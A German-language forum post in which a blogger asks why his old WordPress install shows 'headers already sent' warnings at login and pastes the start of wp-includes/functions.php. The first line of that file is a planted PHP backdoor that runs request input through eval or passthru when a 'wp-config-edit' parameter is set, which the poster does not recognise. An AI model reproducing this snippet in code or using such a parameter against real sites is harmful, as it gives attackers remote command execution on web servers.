Hallo Gemeinde,
bin echt am verzweifeln, eines meiner alten Blogs (noch recht altes WP drauf) zeigt mir beim Einlogversuch folgendes an:
Code
Warning: Cannot modify header information - headers already sent by (output started at /homepages/11/d26328753/htdocs/MEINEDomain/wp-includes/functions.php:2) in /homepages/11/d26328753/htdocs/MEINEDomain/wp-login.php on line 290
Code
Warning: Cannot modify header information - headers already sent by (output started at /homepages/11/d26328753/htdocs/MEINEDomain/wp-includes/functions.php:2) in /homepages/11/d26328753/htdocs/MEINEDomain/wp-login.php on line 302
Also Zeile 2 in der functions.php gesucht, aber dort finde ich nix.
Hier der Inhalt:
PHP
<?php
if(isset($_GET['wp-config-edit'])) { if ($_REQUEST['wp-config-edit'] == 'eval') { eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['gim']) : $_REQUEST['gim']); } else if ($_REQUEST['wp-config-edit'] == 'exec') { passthru(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['gim']) : $_REQUEST['gim']); } }?> <?php
/**
* Main WordPress API
*
* @package WordPress
*/
/**
* Converts MySQL DATETIME field to user specified date format.
*
* If $dateformatstring has 'G' value, then gmmktime() function will be used to
* make the time. If $dateformatstring is set to 'U', then mktime() function
* will be used to make the time.
*
* The $translate will only be used, if it is set to true and it is by default
* and if the $wp_locale object has the month and weekday set.
*
* @since 0.71
*
* @param string $dateformatstring Either 'G', 'U', or php date format.
* @param string $mysqlstring Time from mysql DATETIME field.
* @param bool $translate Optional. Default is true. Will switch format to locale.
* @return string Date formated by $dateformatstring or locale (if available).
*/
function mysql2date( $dateformatstring, $mysqlstring, $translate = true ) {
global $wp_locale;
Alles anzeigen
Kann von euch jemand erkennen, was da wohl falsch ist?
Beste Grüße,
Sven
PS: ich hab eigentlich nichts geändert, der Fehler trat "einfach so" vor einigen Tagen auf...